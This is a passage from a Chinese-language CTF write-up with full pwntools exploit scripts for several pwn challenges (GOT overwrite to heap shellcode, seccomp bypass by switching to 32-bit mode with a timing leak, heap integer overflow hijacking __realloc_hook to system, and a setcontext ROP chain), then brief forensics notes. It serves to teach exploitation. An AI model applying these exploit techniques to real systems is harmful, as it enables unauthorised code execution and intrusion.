if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        elf = ELF(elf_path)
        io = remote(host.split(':')[0], int(host.split(':')[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

orw

一个伪heap题,开启了沙箱,编辑和打印功能没有,只能开辟两次堆,释放一次,没办法进行堆操作。

存在个index 负数溢出,可以实现修改got表,为堆地址。

__int64 sub_E44()
{
  int idx; // [rsp+0h] [rbp-10h]
  int size; // [rsp+4h] [rbp-Ch]

  if ( add_nums <= 1 )
  {
    puts("index:");
    idx = inputn();
    puts("size:");
    size = inputn();
    if ( size >= 0 && size <= 8 && idx <= 1 )   // index overflow
    {
      bufs[idx] = malloc(size);
      if ( !bufs[idx] )
      {
        puts("error");
        exit(0);
      }
      puts("content:");
      readn((_BYTE *)bufs[idx], size);
      ++add_nums;
    }
  }
  return add_nums;
}

查看程序架构

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments

checksec发现存在rwx段,但发现是stack上的,想了半天没想通如何跳到堆栈那里去。

试试在堆上写shellcode,然后index溢出漏洞修改atoi的got地址为shellcode堆地址,跳到堆中执行指令,然而发现远程能执行,但自己本地不行,接下来就是orw的汇编指令编写了。

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: i0gan
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')
context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']

elf_path  = './pwn'
libc_path = './libc.so.6'
#libc_path = '/lib/x86_64-linux-gnu/libc.so.6'

# remote server ip and port
host = "39.105.131.68:12354"
#io = process(elf_path, env = {'LD_PRELOAD': libc_path})
io = remote(host.split(':')[0], int(host.split(':')[1]))
libc = ELF(libc_path)
#--------------------------func-----------------------------
def db():
    gdb.attach(io)

def ad(idx, sz, d):
    sla('>>', '1')
    sla(':', str(idx))
    sla(':', str(sz))
    sa(':', d)

def dp(idx):
    sla('>>', '1')

def md():
    sla('>>', '1')

def rm(idx):
    sla('>>', '4')
    sla(':', str(idx))

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    #for i in range(2):
    # wirte
    code = '''
    lea r15, [rip + 0xf9] /* buf */
    mov rdi, r15 /*buf*/
    mov rsi, 0x0 
    mov rdx, 0x0
    mov rax, 2
    syscall

    /*read*/
    mov rdi, 3
    mov rsi, r15
    mov rdx, 0x100
    mov rax, 0
    syscall

    /*write*/
    mov rdi, 1
    mov rax, 1
    syscall
    '''

    p = asm(code, arch = 'amd64')
    p = p.ljust(0x100, b'\x00')
    p += b'./flag\x00'

    ad(-14, 0, p + b'\n')
#    db()
    # call
    sla('>>', '4')

def finish():
    ia()
    c()

exploit()
finish()

shellcode

沙箱检查如下

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x06 0x00 0x00000005  if (A == fstat) goto 0008
 0002: 0x15 0x05 0x00 0x00000025  if (A == alarm) goto 0008
 0003: 0x15 0x03 0x00 0x00000004  if (A == stat) goto 0007
 0004: 0x15 0x03 0x00 0x00000000  if (A == read) goto 0008
 0005: 0x15 0x02 0x00 0x00000009  if (A == mmap) goto 0008
 0006: 0x15 0x01 0x00 0x000000e7  if (A == exit_group) goto 0008
 0007: 0x06 0x00 0x00 0x00000000  return KILL
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW

输入的shellcode有检查

 for ( i = 0; i < v6; ++i )
 {
    if ( v4[i] <= 31 || v4[i] == '\x7F' )
      goto LABEL_10;
 }

也就是机器码字符小于等于’\x31’的就退出或等于’\x7f’,我们可以采用alpha3工具将机器码生成可显示字符,当然这个工具有限制,机器码不能出现’\x00’,通过调试发现,shellcode的基址存放在rbx上,我们先实现一个输入的shellcode,避免后续不会再进行shellcode过滤。

    code = '''
    mov r15, rbx
    xor rdx, rdx
    add dx, 0x1080
    mov rsi, r15
    add si, 0x120
    xor rax, rax
    syscall
    jmp rsi
    '''

在原来的shellcode + 0x120处实现输入,再跳到那个地方去。

采用alpha3工具生成可显示shellcode如下

Sh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M144x8k1L0I3z2m4p4N4p0Y1O3c8L2k4u4v2t0O1L0A400V044p3E0c

当然我也写了个函数方便修改。

def gen_code():
    fd = open('sc.bin', 'wb')
    code = '''
    mov r15, rbx
    xor rdx, rdx
    add dx, 0x1080
    mov rsi, r15
    add si, 0x120
    xor rax, rax
    syscall
    jmp rsi
    '''
    p = asm(code, arch = 'amd64')
    fd.write(p)
    fd.close()
    cmd = '~/share/ctf/alpha3/ALPHA3.py x64 ascii mixedcase rbx --input="./sc.bin"'
    p = os.popen(cmd).read()
    print('shellcode: ' + p)
    return p

然而这个题禁用函数太多了,open和write也禁了,只能切换到32位架构来实现部分绕过了,为了方便实现堆栈,指令储存,我重新申请了个地址段,方便后续实现架构切换方便与数据写入等。

    code = '''
    /*mmap*/
    mov r9d, 0          /* off */
    mov r8d, 0xFFFFFFFF /* fd */ 
    mov r10d, 0x22 /* flags */
    mov edx, 7          /* prot */
    mov esi, 0x1000      /* len */
    mov edi, 0x20000          /* addr */
    mov eax, 9
    syscall 

    /*read 32 shellcode*/
    xor rax, rax
    mov edi, 0
    mov esi, 0x20000
    mov edx, 0x1000 
    syscall

    /*retf to 32*/
    mov rax, 0x2300020000
    push rax
    '''
    p = asm(code, arch = 'amd64')
    p += b'\xCB' # retf

上面是实现向我们开辟到的内存写入数据,再从64位架构切换到32为且跳到我们开辟的内存段中。

后面就是写32位的asm code了,然而我发现,在32位下,只有一个有用的函数能调用,就是open函数,其他的read,write这些都不能调用了,这又使得重新回到64位下实现读入flag。

    code = '''
    mov esp, 0x20a00

    /*open*/
    mov eax, 5 
    mov ebx, 0x20020
    xor ecx, ecx
    xor edx, edx
    int 0x80

    /*retf to 64*/
    push 0x33
    push 0x20030
    '''

    db()
    p = asm(code, arch = 'i386')
    p += b'\xCB' # retf
    p = p.ljust(0x20, b'\x90')
    p += b'./flag\x00'
    p = p.ljust(0x30, b'\x90')

    code = ''' 
    xor rax, rax
    mov edi, 3
    mov rsi, rsp
    mov edx, 0x100
    syscall

    '''

由于不能使用write的系统调用,只能采用延时爆破了

    if idx == 0:
        code += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(idx, ch)
    else:
        code += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(idx, ch)

idx为读入的字符偏移,ch是我们猜测的字符,若想等,就进入死循环,否则就退出。

通过时间来判断是否想等。

总结:

这个题确实有点坑,shellcode必须为可显字符,后面绕过了,只能用少量的系统函数,64位架构时,只能使用read, mmap, fstat,我还以为切换架构到32位可以绕过syscall检测,想不到只允许调用open, 其他的read和write都不行,又重新切换到64位来执行read,再采用爆破读出来。

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: i0gan
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

#context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = './shellcode'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# remote server ip and port
host = "39.105.137.118:50050"

# if local debug
LOCAL = 0
LIBC  = 0
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)

def gen_code():
    fd = open('sc.bin', 'wb')
    code = '''
    mov r15, rbx
    xor rdx, rdx
    add dx, 0x1080
    mov rsi, r15
    add si, 0x120
    xor rax, rax
    syscall
    jmp rsi
    '''
    p = asm(code, arch = 'amd64')
    fd.write(p)
    fd.close()
    cmd = '~/share/ctf/alpha3/ALPHA3.py x64 ascii mixedcase rbx --input="./sc.bin"'
    p = os.popen(cmd).read()
    print('shellcode: ' + p)
    return p
#--------------------------exploit--------------------------
# ref: https://www.yuque.com/chenguangzhongdeyimoxiao/xx6p74/tqpsqr
# ref: https://blog.csdn.net/SmalOSnail/article/details/105236336
# ref: http://blog.leanote.com/post/xp0int/%5BPwn%5D-Steak-cpt.shao
# ref: https://zhuanlan.zhihu.com/p/57648345
#  ~/share/ctf/alpha3/ALPHA3.py x64 ascii mixedcase rbx --input="sc.bin" > o

def exploit(idx, ch):
    li('exploit...')
    '''
    git clone https://github.com/TaQini/alpha3.git
    cd alpha3
    python ./ALPHA3.py x64 ascii mixedcase rax --input="sc.bin"
    rax: shellcode base_address
    '''
    # python ./ALPHA3.py x64 ascii mixedcase rax --input="sc.bin"
    #p = gen_code()
    p = 'Sh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M144x8k1L0I3z2m4p4N4p0Y1O3c8L2k4u4v2t0O1L0A400V044p3E0c'
    s(p)

    code = '''
    /*mmap*/
    mov r9d, 0          /* off */
    mov r8d, 0xFFFFFFFF /* fd */ 
    mov r10d, 0x22 /* flags */
    mov edx, 7          /* prot */
    mov esi, 0x1000      /* len */
    mov edi, 0x20000          /* addr */
    mov eax, 9
    syscall 

    /*read 32 shellcode*/
    xor rax, rax
    mov edi, 0
    mov esi, 0x20000
    mov edx, 0x1000 
    syscall

    /*retf to 32*/
    mov rax, 0x2300020000
    push rax
    '''
    p = asm(code, arch = 'amd64')
    p += b'\xCB' # retf

    #p += p32(0x400000) + p32(0x23) # ret addr + 0x23:32bit sign
    sleep(0.01)
    s(p)

    code = '''
    mov esp, 0x20a00

    /*open*/
    mov eax, 5 
    mov ebx, 0x20020
    xor ecx, ecx
    xor edx, edx
    int 0x80

    /*retf to 64*/
    push 0x33
    push 0x20030
    '''

    db()
    p = asm(code, arch = 'i386')
    p += b'\xCB' # retf
    p = p.ljust(0x20, b'\x90')
    p += b'./flag\x00'
    p = p.ljust(0x30, b'\x90')

    code = ''' 
    xor rax, rax
    mov edi, 3
    mov rsi, rsp
    mov edx, 0x100
    syscall

    '''

    if idx == 0:
        code += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(idx, ch)
    else:
        code += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(idx, ch)

    p += asm(code, arch = 'amd64')
    sleep(0.01)
    s(p)

    start = time.time()
    try:
        io.recv(timeout = 2)
    except:
        pass
    end = time.time()

    if (end - start > 1.5):
        return ch
    else:
        return None

def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    flag = ''
    idx = 3
    while True:
        for ch in range(0x20, 127):
            if LOCAL:
                elf = ELF(elf_path)
                if LIBC:
                    libc = ELF(libc_path)
                io = elf.process()
            else:
                elf = ELF(elf_path)
                io = remote(host.split(':')[0], int(host.split(':')[1]))
                if LIBC:
                    libc = ELF(libc_path)

            ret = exploit(idx, ch)
            if(ret != None):
                li('found: ' + chr(ch))
                flag += chr(ch)
                li('flag: ' + flag)
                idx += 1
            io.close()

pipeline

没有free函数,通过设置大小为0即可实现释放内存功能。

找了偏移,chunk头部链表逻辑,没有发现漏洞,在编辑数据的功能中,发现了个整型溢出漏洞。

漏洞点

_QWORD *edit_body()
{
  _QWORD *result; // rax
  int size; // eax
  int index; // [rsp+10h] [rbp-10h]
  int v3; // [rsp+14h] [rbp-Ch]
  _QWORD *buf; // [rsp+18h] [rbp-8h]

  index = print("index: ");
  result = (_QWORD *)get_buf(index);
  buf = result;
  if ( result )
  {
    result = (_QWORD *)*result;
    if ( *buf )
    {
      v3 = print("size: ");
      printf("data: ");
      size = *((_DWORD *)buf + 3) - *((_DWORD *)buf + 2);// size - offset
      if ( v3 <= size )
        LOWORD(size) = v3;                      // vul
      result = (_QWORD *)readn(*buf + *((int *)buf + 2), size);
    }
  }
  return result;
}

一个整性溢出,因为采用LOWORD(size) = v3;进行赋值的,当我输入负数绕过判断,若LOWORD(v3)中的值为大于size本身值,即可实现溢出,那么就很好利用了。实现了任意地址写入,但有个检查

unsigned __int64 __fastcall check_error(unsigned __int64 ptr)
{
  unsigned __int64 result; // rax

  if ( ptr < *(_QWORD *)check_mem_buf
    || (result = *(_QWORD *)check_mem_buf + *(_QWORD *)(check_mem_buf + 8), ptr >= result) )
  {
    puts("error");
    exit(0);
  }
  return result;
}

而check_mem_buf的值在初始化的时候赋予了

unsigned int init_()
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  check_mem_buf = (__int64)malloc(0x10uLL);
  *(_QWORD *)check_mem_buf = check_mem_buf + 16;
  *(_QWORD *)(check_mem_buf + 8) = 0x21000LL;   // memsize
  return alarm(0x78u);
}

基本上我们只能在堆段中实现任意地址写入了,这也比较好绕过,每个编辑功能都有个head chunk,修改head中的body指针,就可以实现任意地址写入数据了。

修改__realloc_hook为system,再调用realloc函数即可调用system。

exp

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
# Author: i0gan
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = 'pipeline'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'
#libc_path = '/lib/x86_64-linux-gnu/libc.so.6'

# remote server ip and port
host = "59.110.173.239:2399"

# if local debug
LOCAL = 0
LIBC  = 1
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)

def ad():
    sla('>>', '1')

def md(idx, of, sz):
    sla('>>', '2')
    sla(':', str(idx))
    sla(':', str(of))
    sla(':', str(sz))

def rm(idx):
    sla('>>', '3')
    sla(':', str(idx))

def ap(idx, sz, d):
    sla('>>', '4')
    sla(':', str(idx))
    sla(':', str(sz))
    sa(':', d)

def dp(idx):
    sla('>>', '5')
    sla(':', str(idx))

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    # leak libc
    ad()
    md(0, 0, 0x458)

    ad()
    md(0, 0, 0) # free

    md(0, 0, 0x458) # add
    dp(0)
    leak = u64(ru('\x7f')[-5:] + b'\x7f\x00\x00')
    libc_base = leak - libc.sym['__malloc_hook'] - 96 - 0x10
    li('libc_base: ' + hex(libc_base))

    # leak heap
    md(0, 0, 0) # free

    md(0, 0, 0x18) # add
    md(1, 0, 0x18) # add
    #ap(0, -1, 'A')

    ap(0, 0x18, b'A' * 0x10 + p64(0x1234))
    md(0, 0, 0)  # free
    md(1, 0, 0)  # free

    md(0, 0, 0x18)  # add
    dp(0)
    ru('data: ')
    leak = u64(ru('\n').ljust(8, b'\x00'))
    heap = leak
    li('heap: ' + hex(heap))


    ad()
    md(1, 0x18, 0)  # add 1
    md(2, 0x18, 0)  # add 2

    ad()
    md(3, 0x18, 0)  # add 3


    md(2, 0, 0)  # free 2
    md(3, 0, 0)  # free 3
    md(1, 0, 0)  # free 1

    li('target_chunk: ' + hex(heap + 0x460))
    p = b'\x00' * 0x18
    p += p64(0x21) + p64(heap + 0x460) + p64(0)
    p += b'\n'
    ap(0, -0x7ffff00, p)
    md(3, 0, 0x18)  # add 3

    md(2, 0, 0x18)  # add 2
    p = p64(libc_base + libc.sym['__realloc_hook']) + p64(0x0000001800000000)
    p += b'\n'
    ap(2, 0x18, p)

    ap(1, 0x18, p64(libc_base + libc.sym['system']) + b'\n')

    ap(0, 0x18, '/bin/sh\x00\n')
    md(0, 0, 0)  # free , to get shell

def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        elf = ELF(elf_path)
        io = remote(host.split(':')[0], int(host.split(':')[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

babypwn

这个题也是个坑,打印函数采用加密

int __fastcall enc_print(unsigned int a1)
{
  int i; // [rsp+1Ch] [rbp-4h]

  for ( i = 2; i > 0; --i )
    a1 ^= (32 * a1) ^ ((a1 ^ (32 * a1)) >> 17) ^ (((32 * a1) ^ a1 ^ ((a1 ^ (32 * a1)) >> 17)) << 13);
  return printf("%lx\n", a1);
}

采用z3库来解,只能解一次循环加密的,第二次循环的解不出来,只能不用该条件了。

漏洞点

unsigned __int64 __fastcall chc(_BYTE *a1)
{
  unsigned __int64 ch_; // rax

  while ( 1 )
  {
    ch_ = (unsigned __int8)*a1;
    if ( !(_BYTE)ch_ )
      break;
    if ( *a1 == '\x11' )                        // vul
    {
      ch_ = (unsigned __int64)a1;
      *a1 = 0;
      return ch_;
    }
    ++a1;
  }
  return ch_;
}

在输入完数据后,会死循环读取数据,若出现’\x00’则跳出,若出现’\x11’修改该字节为’\x00’且跳出循环。这利用方式就跟off by one差不多了。

程序开了沙箱

__int64 sub_BAA()
{
  __int64 v1; // [rsp+8h] [rbp-8h]

  v1 = seccomp_init(2147418112LL);
  seccomp_rule_add(v1, 0LL, 59LL, 0LL);
  return seccomp_load(v1);
}

前期我以为程序是在2.31下的利用方式,我一直在glibc 为2.31的环境下调试,怎么都不好构造绕过prev_size == chunk_size这个检查,查看libc.so.6,发现为2.27的。。。醉了。

那就很方便的采用unlink构造堆重叠,由于没有办法解密上面那个泄漏的数据,只能partial write打到_IO_2_1_stdout泄漏libc,打通几率1 / 16,

泄漏之后,然后劫持__free_hook为setcontext + 53处的gadget实现堆栈迁移值 __free_hook - 0x108处,这里我是放在__free_hook高地址位置的,本地能打通,远程死活打不通,我只调用write函数能够泄漏地址信息,应该是某些部分数据被覆盖,导致我的rop链破坏了,只能将rop放在__free_hook上面。

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: i0gan
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = './babypwn'
#libc_path = '/glibc/2.23/64/lib/libc.so.6'
#libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
libc_path = './libc.so.6'

# remote server ip and port
host = "39.105.130.158:8888"

# if local debug
LOCAL = 0
LIBC  = 1
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)
def ad(sz):
    sla('>>', '1')
    sla(':', str(sz))

def rm(idx):
    sla('>>', '2')
    sla(':', str(idx))

def md(idx, d):
    sla('>>', '3')
    sla(':', str(idx))
    sa(':', d)

def dp(idx):
    sla('>>', '4')
    sla(':', str(idx))

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    ad(0x108) # 0
    ad(0x128) # 1
    ad(0x118) # 2
    ad(0x108) # 3

    for i in range(7):
        ad(0x100)

    for i in range(4, 11):
        rm(i)

    for i in range(7):
        ad(0xf0)

    for i in range(4, 11):
        rm(i)
    rm(0) # set libc


    md(2, 'A' * 0x118) # set last one
    md(2, b'A' * 0x110 + p64(0x120 + 0x130 + 0x110))
    md(3, b'A' * 0xf8 + p64(0x121)) # set fake size

    rm(3) # unlink

    ad(0x108) # 0
    ad(0x108) # 3

    ad(0x108) # 4
    ad(0x108) # 5
    ad(0x108) # 7
    ad(0x108) # 8
    ad(0x108) # 9

    rm(2) # remove chunk1

    ad(0xd0) # 2
    ad(0x150) # 9

    ad(0x130) # 10
    #2760
    md(10, '\x50\x97') # set to stdout

    ad(0x118) # 11
    ad(0x118) # 12

    p = b'A' * 0x10
    p += p64(0xfbad3c80) + p64(0) * 3 + p8(0)
    md(12, p)

    leak = u64(ru('\x7f')[-5:] + b'\x7f\x00\x00')
    libc_base = leak - (0x7ffff7b8a8b0 - 0x7ffff779d000)
    li('libc_base: ' + hex(libc_base))

    rm(11)
    md(10, p64(libc_base + libc.sym['__free_hook'] - 0x110))

    ad(0x130) # 11
    ad(0x130) # 13

    libc_open = libc_base + libc.sym['open']
    libc_read = libc_base + libc.sym['read']
    libc_write = libc_base + libc.sym['write']
    pop_rdx_rsi = libc_base + 0x00000000001306d9 # pop rdx ; pop rsi ; ret
    pop_rdi = libc_base + 0x000000000002155f # pop rdi ; ret
    ret = libc_base + 0x00000000000008aa # ret
    pop_rax = libc_base + 0x00000000000439c8 # pop rax ; ret
    syscall = libc_base + 0x11007f

    '''
    p = p64(libc_base + 0x520a5) # setcontext
    p += p64(pop_rdi) + p64(libc_base + libc.sym['__free_hook'] + 0x120)
    p += p64(pop_rdx_rsi) + p64(0) + p64(0)
    p += p64(libc_open)
    p += p64(pop_rdi) + p64(3)
    p += p64(pop_rdx_rsi) + p64(0x100) + p64(libc_base + libc.sym['__malloc_hook'])
    p += p64(libc_read)
    p += p64(pop_rdi) + p64(1)
    p += p64(libc_write)
    p = p.ljust(0x120, b'\x00')
    p += b'./flag'
    '''

    p = p64(pop_rdi) + p64(libc_base + libc.sym['__free_hook'] - 0x10) # flag
    p += p64(pop_rdx_rsi) + p64(0) + p64(0)
    p += p64(pop_rax) + p64(2)
    p += p64(syscall)

    p += p64(pop_rdi) + p64(3)
    p += p64(pop_rdx_rsi) + p64(0x100) + p64(libc_base + libc.sym['__malloc_hook'])
    p += p64(pop_rax) + p64(0)
    p += p64(syscall)

    p += p64(pop_rdi) + p64(1)
    p += p64(pop_rax) + p64(1)
    p += p64(syscall)

    p = p.ljust(0x100, b'\x00')
    p += b'./flag.txt\x00'.ljust(0x10, b'\x00')
    p += p64(libc_base + 0x520a5) # setcontext

    md(13, p) # modify free_hook

    p = b'A' * 0xa0
    p += p64(libc_base + libc.sym['__free_hook'] - 0x110) # rsp
    p += p64(ret) # rcx
    md(11, p)

    db()
    rm(11)


def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
        #io = elf.process()
        io = process(elf_path, env = {'LD_PREALOAD': libc_path})
    else:
        elf = ELF(elf_path)
        io = remote(host.split(':')[0], int(host.split(':')[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

 

Misc

BlueTeaming

看文件头是7z,解压后得到memory,看题目要找关于powershell的脚本的注册表key,windows下应该是HKEY

如下图:

尝试用HxD搜索关键词powershell,HKEY,发现还真有….

尝试一下确实是这个….但真的吐槽一下,没有格式确实难找…..上午就看到了,晚上才想起来试

CipherMan

取证题,一个secret,用diskgenius挂载了一下发现有密码

用打蓝帽申请的取证大师看了一下memory:

(由于没有有效文件名,这时候我们可以规定为raw,这样就能用取证大师打开)

搜索bek文件,并没有

在desktop中发现:

https://windows10.pro/forget-bitlocker-password-unlocking-with-recovery-keys/

和这个对比了一下,应该是密钥,但是打开是乱码,到现在我也不知道怎么解决这个问题….这条路没走通,于是想着猜一下不太合理的字符串,比如bitlocker对应的序列号.

将文件按照访问时间排序,一个一个看:

Wow, you have a great ability. How did you solve this? Are you a hacker? Please give me a lesson later.

算是非预期把….试出来的…..flag长这样我也没想到…

ExtremelySlow

由pcapng可以导出一个pyc:

尝试在线反编译,发现有部分不能显示,让re手看了一下,

得到:

Instruction context:

 L.  56       262  LOAD_NAME                print
                 264  LOAD_NAME                e
                 266  LOAD_METHOD              decode
                 268  CALL_METHOD_0         0  ''
                 270  CALL_FUNCTION_1       1  ''
                 272  POP_TOP          
->               274  LOAD_CONST               None


# file latest.pyc
# --- This code section failed: ---

 L.   3         0  LOAD_CONST               0
                2  LOAD_CONST               None
                4  IMPORT_NAME              sys
                6  STORE_NAME               sys

 L.   4         8  LOAD_CONST               0
               10  LOAD_CONST               ('sha256',)
               12  IMPORT_NAME              hashlib
               14  IMPORT_FROM              sha256
               16  STORE_NAME               sha256
               18  POP_TOP          

 L.   6        20  LOAD_CODE                <code_object KSA>
               22  LOAD_STR                 'KSA'
               24  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
               26  STORE_NAME               KSA

 L.  16        28  LOAD_CODE                <code_object PRGA>
               30  LOAD_STR                 'PRGA'
               32  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
               34  STORE_NAME               PRGA

 L.  26        36  LOAD_CODE                <code_object RC4>
               38  LOAD_STR                 'RC4'
               40  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
               42  STORE_NAME               RC4

 L.  30        44  LOAD_CODE                <code_object xor>
               46  LOAD_STR                 'xor'
               48  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
               50  STORE_NAME               xor

 L.  33        52  LOAD_NAME                __name__
               54  LOAD_STR                 '__main__'
               56  COMPARE_OP               ==
               58  POP_JUMP_IF_FALSE   139  'to 139'

 L.  34        60  LOAD_CONST               b'\xf6\xef\x10H\xa9\x0f\x9f\xb5\x80\xc1xd\xae\xd3\x03\xb2\x84\xc2\xb4\x0e\xc8\xf3<\x151\x19\n\x8f'
               62  STORE_NAME               w

 L.  35        64  LOAD_CONST               b'$\r9\xa3\x18\xddW\xc9\x97\xf3\xa7\xa8R~'
               66  STORE_NAME               e

 L.  38        68  LOAD_CONST               b'geo'
               70  STORE_NAME               b

 L.  39        72  LOAD_CONST               b'}\xce`\xbej\xa2\x120\xb5\x8a\x94\x14{\xa3\x86\xc8\xc7\x01\x98\xa3_\x91\xd8\x82T*V\xab\xe0\xa1\x141'
               74  STORE_NAME               s

 L.  41        76  LOAD_CONST               b"Q_\xe2\xf8\x8c\x11M}'<@\xceT\xf6?_m\xa4\xf8\xb4\xea\xca\xc7:\xb9\xe6\x06\x8b\xeb\xfabH\x85xJ3$\xdd\xde\xb6\xdc\xa0\xb8b\x961\xb7\x13=\x17\x13\xb1"
               78  STORE_NAME               t

 L.  42        80  LOAD_CONST               115
               82  LOAD_CONST               97
               84  LOAD_CONST               117
               86  LOAD_CONST               114
               88  LOAD_CONST               (2, 8, 11, 10)
               90  BUILD_CONST_KEY_MAP_4     4 
               92  STORE_NAME               m

 L.  43        94  LOAD_CONST               119
               96  LOAD_CONST               116
               98  LOAD_CONST               124
              100  LOAD_CONST               127
              102  LOAD_CONST               (3, 7, 9, 12)
              104  BUILD_CONST_KEY_MAP_4     4 
              106  STORE_NAME               n

 L.  44       108  LOAD_NAME                m
              110  LOAD_DICTCOMP            '<code_object <dictcomp>>'
              112  LOAD_STR                 '<dictcomp>'
              114  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              116  LOAD_NAME                n
              118  GET_ITER         
              120  CALL_FUNCTION_1       1  ''
              122  INPLACE_OR       
              124  STORE_NAME               m

 L.  45       126  LOAD_NAME                m
              128  LOAD_GENEXPR             '<code_object <genexpr>>'
              130  LOAD_STR                 '<genexpr>'
              132  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              134  LOAD_NAME                b
              136  GET_ITER         
              138  CALL_FUNCTION_1       1  ''
              140  INPLACE_OR       
              142  STORE_NAME               m

 L.  47       144  LOAD_NAME                RC4
              146  LOAD_NAME                list
              148  LOAD_NAME                map
              150  LOAD_LAMBDA              '<code_object <lambda>>'
              152  LOAD_STR                 '<lambda>'
              154  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              156  LOAD_NAME                sorted
              158  LOAD_NAME                m
              160  LOAD_METHOD              items
              162  CALL_METHOD_0         0  ''
              164  CALL_FUNCTION_1       1  ''
              166  CALL_FUNCTION_2       2  ''
              168  CALL_FUNCTION_1       1  ''
              170  CALL_FUNCTION_1       1  ''
              172  STORE_NAME               stream

 L.  48       174  LOAD_NAME                print
              176  LOAD_NAME                xor
              178  LOAD_NAME                w
              180  LOAD_NAME                stream
              182  CALL_FUNCTION_2       2  ''
              184  LOAD_METHOD              decode
              186  CALL_METHOD_0         0  ''
              188  CALL_FUNCTION_1       1  ''
              190  POP_TOP          

 L.  49       192  LOAD_NAME                sys
              194  LOAD_ATTR                stdin
              196  LOAD_ATTR                buffer
              198  LOAD_METHOD              read
              200  CALL_METHOD_0         0  ''
              202  STORE_NAME               p

 L.  50       204  LOAD_NAME                xor
              206  LOAD_NAME                e
              208  LOAD_NAME                stream
              210  CALL_FUNCTION_2       2  ''
              212  STORE_NAME               e

 L.  52       214  LOAD_NAME                xor
              216  LOAD_NAME                p
